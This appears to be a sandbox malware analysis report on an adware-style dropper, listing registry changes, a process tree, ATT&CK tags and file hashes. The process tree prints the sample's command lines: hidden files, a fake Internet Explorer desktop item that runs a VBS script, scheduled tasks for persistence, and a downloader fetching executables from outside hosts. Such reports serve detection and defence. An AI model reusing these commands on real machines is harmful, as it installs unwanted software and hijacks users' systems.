\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder\WantsParsDisplayName reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB} reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\Command\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)\Command\ = "rundll32.exe shell32.dll,Control_RunDLL INETCPL.CPL,,0" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder\HideOnDesktopPerUser reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R) reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder\HideFolderVerbs reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\Command reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)\ reg.exe -
Runs net.exe
-
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4956 iexplore.exe -
Suspicious use of SetWindowsHookEx 13 IoCs
pid Process 4956 iexplore.exe 4956 iexplore.exe 548 IEXPLORE.EXE 548 IEXPLORE.EXE 4884 ar2.exe 4884 ar2.exe 4884 ar2.exe 3800 ar2.exe 3800 ar2.exe 3800 ar2.exe 4108 ar2.exe 4108 ar2.exe 4108 ar2.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3204 wrote to memory of 4140 3204 e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe 86 PID 3204 wrote to memory of 4140 3204 e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe 86 PID 3204 wrote to memory of 4140 3204 e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe 86 PID 4140 wrote to memory of 4460 4140 WScript.exe 88 PID 4140 wrote to memory of 4460 4140 WScript.exe 88 PID 4140 wrote to memory of 4460 4140 WScript.exe 88 PID 4460 wrote to memory of 4956 4460 cmd.exe 90 PID 4460 wrote to memory of 4956 4460 cmd.exe 90 PID 4140 wrote to memory of 3820 4140 WScript.exe 92 PID 4140 wrote to memory of 3820 4140 WScript.exe 92 PID 4140 wrote to memory of 3820 4140 WScript.exe 92 PID 3820 wrote to memory of 3572 3820 cmd.exe 94 PID 3820 wrote to memory of 3572 3820 cmd.exe 94 PID 3820 wrote to memory of 3572 3820 cmd.exe 94 PID 3820 wrote to memory of 1732 3820 cmd.exe 95 PID 3820 wrote to memory of 1732 3820 cmd.exe 95 PID 3820 wrote to memory of 1732 3820 cmd.exe 95 PID 4956 wrote to memory of 548 4956 iexplore.exe 96 PID 4956 wrote to memory of 548 4956 iexplore.exe 96 PID 4956 wrote to memory of 548 4956 iexplore.exe 96 PID 3820 wrote to memory of 2756 3820 cmd.exe 97 PID 3820 wrote to memory of 2756 3820 cmd.exe 97 PID 3820 wrote to memory of 2756 3820 cmd.exe 97 PID 3820 wrote to memory of 3428 3820 cmd.exe 98 PID 3820 wrote to memory of 3428 3820 cmd.exe 98 PID 3820 wrote to memory of 3428 3820 cmd.exe 98 PID 3820 wrote to memory of 4328 3820 cmd.exe 99 PID 3820 wrote to memory of 4328 3820 cmd.exe 99 PID 3820 wrote to memory of 4328 3820 cmd.exe 99 PID 3820 wrote to memory of 824 3820 cmd.exe 100 PID 3820 wrote to memory of 824 3820 cmd.exe 100 PID 3820 wrote to memory of 824 3820 cmd.exe 100 PID 3820 wrote to memory of 4992 3820 cmd.exe 101 PID 3820 wrote to memory of 4992 3820 cmd.exe 101 PID 3820 wrote to memory of 4992 3820 cmd.exe 101 PID 3820 wrote to memory of 4596 3820 cmd.exe 102 PID 3820 wrote to memory of 4596 3820 cmd.exe 102 PID 3820 wrote to memory of 4596 3820 cmd.exe 102 PID 3820 wrote to memory of 3104 3820 cmd.exe 103 PID 3820 wrote to memory of 3104 3820 cmd.exe 103 PID 3820 wrote to memory of 3104 3820 cmd.exe 103 PID 3820 wrote to memory of 2744 3820 cmd.exe 104 PID 3820 wrote to memory of 2744 3820 cmd.exe 104 PID 3820 wrote to memory of 2744 3820 cmd.exe 104 PID 3820 wrote to memory of 4856 3820 cmd.exe 105 PID 3820 wrote to memory of 4856 3820 cmd.exe 105 PID 3820 wrote to memory of 4856 3820 cmd.exe 105 PID 3820 wrote to memory of 2204 3820 cmd.exe 106 PID 3820 wrote to memory of 2204 3820 cmd.exe 106 PID 3820 wrote to memory of 2204 3820 cmd.exe 106 PID 3820 wrote to memory of 3868 3820 cmd.exe 107 PID 3820 wrote to memory of 3868 3820 cmd.exe 107 PID 3820 wrote to memory of 3868 3820 cmd.exe 107 PID 3820 wrote to memory of 2132 3820 cmd.exe 108 PID 3820 wrote to memory of 2132 3820 cmd.exe 108 PID 3820 wrote to memory of 2132 3820 cmd.exe 108 PID 3820 wrote to memory of 1096 3820 cmd.exe 109 PID 3820 wrote to memory of 1096 3820 cmd.exe 109 PID 3820 wrote to memory of 1096 3820 cmd.exe 109 PID 3820 wrote to memory of 1008 3820 cmd.exe 110 PID 3820 wrote to memory of 1008 3820 cmd.exe 110 PID 3820 wrote to memory of 1008 3820 cmd.exe 110 PID 3820 wrote to memory of 440 3820 cmd.exe 111 PID 3820 wrote to memory of 440 3820 cmd.exe 111 -
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 3572 attrib.exe 1732 attrib.exe 2756 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe"C:\Users\Admin\AppData\Local\Temp\e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe"1⤵
- Checks computer location settings
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3204 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\Kingsoft\myfile\file.vbs"2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4140 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C start /min iexplore http://www.dao666.com/index2.html?ha3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4460 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.dao666.com/index2.html?ha4⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4956 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4956 CREDAT:17410 /prefetch:25⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:548
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C .\tool.cmd3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3820 -
C:\Windows\SysWOW64\attrib.exeattrib +r +h +s ".\Microsoft\bot.vbs"4⤵
- Sets file to hidden
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:3572
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +h +s ".\tool.cmd"4⤵
- Sets file to hidden
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:1732
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +h +s ".\open.vbs"4⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:2756
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoInternetIcon" /t REG_DWORD /d 1 /f4⤵
- System Location Discovery: System Language Discovery
PID:3428
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}"4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4328
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}" /v "InfoTip" /t REG_SZ /d "@shdoclc.dll,-880" /f4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:824
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}" /v "LocalizedString" /t REG_SZ /d "@shdoclc.dll,-880" /f4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4992
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\DefaultIcon"4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4596
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\DefaultIcon" /ve /t REG_EXPAND_SZ /d "shdoclc.dll,0" /f4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:3104
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32"4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2744
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32" /ve /t REG_SZ /d "%systemRoot%\system32\shdocvw.dll" /f4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4856
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32" /v "ThreadingModel" /t REG_SZ /d "Apartment" /f4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2204
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell"4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:3868
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell" /ve /t REG_SZ /d "┤≥┐¬╓≈╥│(&H)" /f4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2132
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)"4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1096
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)" /v "MUIVerb" /t REG_SZ /d "@shdoclc.dll,-10241" /f4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1008
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\Command"4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:440
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\Command" /ve /t REG_SZ /d "wscript.exe c:\progra~1\Kingsoft\myfile\Microsoft\bot.vbs" /f4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:3500
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)"4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:752
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)\Command"4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1156
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)\Command" /ve /t REG_SZ /d "rundll32.exe shell32.dll,Control_RunDLL INETCPL.CPL,,0" /f4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4652
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder"4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1184
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder" /v "Attributes" /t REG_DWORD /d 0 /f4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:536
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder" /v "HideFolderVerbs" /t REG_SZ /d "" /f4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1116
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder" /v "HideOnDesktopPerUser" /t REG_SZ /d "" /f4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1412
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder" /v "WantsParsDisplayName" /t REG_SZ /d "" /f4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4352
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C .\fav\fav.cmd3⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:4136
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C .\runonce.cmd3⤵
- System Location Discovery: System Language Discovery
PID:4448 -
C:\Windows\SysWOW64\sc.exesc create Schedule binpath= "C:\Windows\svchost.exe -k netsvcs" depend= rpcss start= auto displayname= "Task Scheduler"4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
- System Service Discovery
PID:2440
-
-
C:\Windows\SysWOW64\sc.exesc config Schedule start= auto4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1264
-
-
C:\Windows\SysWOW64\net.exenet start "Task Scheduler"4⤵
- System Location Discovery: System Language Discovery
- System Service Discovery
PID:4828 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start "Task Scheduler"5⤵
- System Location Discovery: System Language Discovery
- System Service Discovery
PID:3616
-
-
-
C:\Windows\SysWOW64\at.exeat 8:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DBBBB}"4⤵
- System Location Discovery: System Language Discovery
PID:2520
-
-
C:\Windows\SysWOW64\at.exeat 11:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DBBBB}"4⤵
- System Location Discovery: System Language Discovery
PID:4996
-
-
C:\Windows\SysWOW64\at.exeat 14:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DBBBB}"4⤵
- System Location Discovery: System Language Discovery
PID:2676
-
-
C:\Windows\SysWOW64\at.exeat 17:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DBBBB}"4⤵
- System Location Discovery: System Language Discovery
PID:4696
-
-
C:\Windows\SysWOW64\at.exeat 21:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DBBBB}"4⤵
- System Location Discovery: System Language Discovery
PID:2188
-
-
C:\Windows\SysWOW64\at.exeat 23:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DBBBB}"4⤵
- System Location Discovery: System Language Discovery
PID:1772
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C .\360.cmd3⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:2752
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C .\cpa.cmd3⤵
- System Location Discovery: System Language Discovery
PID:5080 -
C:\Program Files\Kingsoft\myfile\soft\msn.exe"C:\Program Files\Kingsoft\myfile\soft\msn.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4292 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe" "http://download.youbak.com/msn/software/partner/36a.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4884
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe" "http://soft.downxiazai.info/soft/YoudaoDict_zhusha_quantui_001.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3800
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe" "http://www.xunlei6x.com/msn/software/partner/1/chic7.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4108
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C del .\runonce.cmd3⤵
- System Location Discovery: System Language Discovery
PID:2884
-
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
Hide Artifacts
2Hidden Files and Directories
2Indicator Removal
1File Deletion
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5af37ab2d97a8822d603054ba02e453b6
SHA1a9c3892ab02681d98f6f6be0666ce2d99a6cb80e
SHA256001a8ba40066c0820d2911c68edbdda46657f1ded63558ba0939760c7b699416
SHA51242e6af1d518cc2cccbb180e59dd77cb2c30463724977edca19de7fa43ae97b988f400e153e151686ca0119d42412dc8d8012d165826e6cefa975c3cfef91e883
-
Filesize
104B
MD5b26bdf8dd432f327015e14428a20790a
SHA1a5db52d58ad5911ee4d54576335c250ccf86083e
SHA256ff0f9b5b7634cadb7a4d58ccb1fa58c015217b6b890995c9ddc83156c9f8f43a
SHA512a532c5b0a22e1cb09beab9d1acbe2a972a02d3a7c7782207410fe40f2a38316155dfc8de63be971ec1d69432ecd9033c971a588d65c40a5abb69d3f4792ba8d4
-
Filesize
162B
MD54741fe194f7332fcd29e7a83921c48d0
SHA187648303da1f415c940753d03a61c0ad6066303d
SHA256647afc0d0ea461025ed7c165ea012b2f9d703d23c21b45d9f67eb71375eb6e05
SHA51268653ce23e453995087f3d707df09ad147e2799181f9535d12e7c46b3bcd85baad281f235ab1f097d867b40f7babebf9bfc5659d9cb644ad050f80a266857f5e
-
Filesize
254B
MD53b24f51190ca32436b8c5b0ef8b2da27
SHA1e8011f11bfebef1f25aa95b0fd5945f74e8ad258
SHA256be1a009d09aabbb90b79d754542d6216ed59ff0e75e7f6fe12def54f1e0fb0d9
SHA512ee67c06f58767aef4045c568514f018c39e5c82498345fb969c9a02ac9280077cd9fa8312156d6c386d2705e187e4347d6018bd078690b360843f43a4f44b4f8
-
Filesize
361B
MD549cb8d1c4ec9b7b4cba2dda2226cf9f9
SHA128878d2840cd6bb8f345aeb185bc9b5acd19f62c
SHA25680f6196a21dbafc669a8468ef3d0a16ded883365264e545237eefddd617d83a3
SHA512d440104c7fb55b6e31cc73ebbeef11fc0ff14380156c1227085325923933210f6f687ee3e0daa1b47e0aed6e0a03e0c7263cdebc3a2e58261bb1f62e46bf229e
-
Filesize
12KB
MD58320a22354a5419af035cdf42902ae93
SHA1d9954707de08eaa6ecc7d13d69f76c51b316ebcc
SHA256419408ac3e52f9b5878825dd3fc416a394ff5665208bbd36930ea52910be04bc
SHA512592c4404292705321da9ec099ff60a22d396395acf31f900d4da661949a40c7966fcb20e7f8cadcd41c1dc729a290d68b21a74a352cb5b1b0a1b7b0ca1d5715b
-
Filesize
1KB
MD54a605601bb2c14b2856257b7b0c9f72b
SHA1e8a205693b77e7c4a35ce1539f2a3750a54a607a
SHA256112e555e915ae44f2270a4c07417ce8e9a7b934bf780b4e534938fff6f47d17e
SHA512b1f6e26a7e41ff23e36b8297842daece7ce0f78abaf9bcf08679e516ff48af6132a9644a87b233d55881043201839c9e37cb8da02b3e7842ee506c0133dcf3cd
-
Filesize
1006B
MD5365359072c2d2b3593d9bb7d8ad2587e
SHA1ee6dc55034ad093e6ec5d81a3af97559cb68e2b6
SHA256eb142788eed404ed50ea562da317e7abb9d0b25fcb5a8c51fec76643430e206d
SHA512f0f6ba5369cbf3aa5315256943e17135297ae937e8cb814a02bcc9d977d84608be843c28ed9067b9d9ed46d46bc07d03bf039495f5dcf2cb0012cd4f15e80544
-
Filesize
1KB
MD5a5adb190983aeba13ddd600df0f54c7c
SHA10f5727a77f726df6e2f54881a4ec14ea349d3c28
SHA2569de9d82ee19a26103e3d18960eee9f8c75b580d5bcfe86182eda70b9fe928b64
SHA5123485c554ed2a7531beaf6cdc4525b9740e2f83e1929848a79f6a1a927453f4dce816443f94d8c32b5f461b4a3e2048cf2268be2076ee907c4f5d2bb0cf913294
-
Filesize
189B
MD5811afc25970fe2402bb05093eb0974db
SHA185c8c5deaf21946519edbf6a73d095097a81c177
SHA2565ec36f1336cb7ba697cd36aeb24b5d86c6e4609f566c0a14c54f5e79b35c6360
SHA5129a2d8cccd9dd43d4dd4bf886c3983fd40cfec5c3484ab221ffbab52884a560476199c61cdc6722ed346a005faf95b4de8dce2a391f7c4db7ef7dee305446017a
-
Filesize
191B
MD5694a79b632b956b7537bf78b4d6cd83a
SHA1ce04560daf58883ff32a01c355fc3db0c012449a
SHA256fee86f4d3a6cd91c94ee5c762b5a56b2fbb8fd880ad31f3ac08d63789d8b47bc
SHA512353a79e00fe3a0fc4c664096b0fcf24230e9eefa3dbad21c53356f7b41d6c21d6f04293473025bc8c7bde130efc9e91ca002a12fa7debe41498a9fe99c8d9bce
-
Filesize
196KB
MD5700742d098ceb5760ecc5428af1d3665
SHA19adb397704593a127a02b121229a3e39bc4e3ca5
SHA256b7a12d2c10911badd73ab91884356d14a48824f216d11e441423b765bf59694d
SHA51244031b16fe3027058a9fb8c3be749de94e7513c7d1ce43ce9966d37ee756d2e1c2645ba318c14a2eef5da744c8952a3304d811d77774bd98b5ade9211516c99f
-
Filesize
3KB
MD503471db7f2a2b9ed56d391fd1224474e
SHA14d3c3f719b56c4feb82a70bc97215d0a5534c817
SHA256fe5e2851c481a0f479b2c6dc2bb6ebf267f10822f542b19d2dc71adbd67f5371
SHA51236c2e1ef0e0d062a22132e90083fe49fd8bad8f0f8443f651e70e3f87735f27edb1b3ed4a513e4c51ca1f9ae28205a12b0096aaa10220eb685bb2116819a0b0a
-
Filesize
15KB
MD51a545d0052b581fbb2ab4c52133846bc
SHA162f3266a9b9925cd6d98658b92adec673cbe3dd3
SHA256557472aeaebf4c1c800b9df14c190f66d62cbabb011300dbedde2dcddd27a6c1
SHA512bd326d111589d87cd6d019378ec725ac9ac7ad4c36f22453941f7d52f90b747ede4783a83dfff6cae1b3bb46690ad49cffa77f2afda019b22863ac485b406e8d
-
Filesize
17KB
MD55a34cb996293fde2cb7a4ac89587393a
SHA13c96c993500690d1a77873cd62bc639b3a10653f
SHA256c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee
-
Filesize
228KB
MD50c18455508ca5d9ced9b8c51046af383
SHA1da113b832bd2acb6190947d4e11f5a97a0be80a8
SHA256fb254313e1f3aba11d554fe4725e72ed9b797b954fd42f4fb1abc60cfd8e51cf
SHA5126f2962d45055c8a934788f61afeda407e5262ac52c05316533206dbbfb279e00d78e72f3148383265e29bf1f94782d1994ddd40602cc536ca4feed12d3d157e4
-
Filesize
114B
MD5e89f75f918dbdcee28604d4e09dd71d7
SHA1f9d9055e9878723a12063b47d4a1a5f58c3eb1e9
SHA2566dc9c7fc93bb488bb0520a6c780a8d3c0fb5486a4711aca49b4c53fac7393023
SHA5128df0ab2e3679b64a6174deff4259ae5680f88e3ae307e0ea2dfff88ec4ba14f3477c9fe3a5aa5da3a8e857601170a5108ed75f6d6975958ac7a314e4a336aed0
-
Filesize
794B
MD51bc415b31cdff50d79ea2a3d7b4ff2c1
SHA1f5ebab61deebc3d7a4a6676a23b982f1418ae6a6
SHA256582ea6421c80adc1de2dcb34fb8db1926e34b49219d99306693166a6b268d412
SHA512ee9718e829fa7c6b2e3b208fe99acd390d704a4ad037fd9b5ae231db184f48146792fb1ac028a69224ddca2c3195ef2aa5353ee6bc7abe01157773f4a6e50e84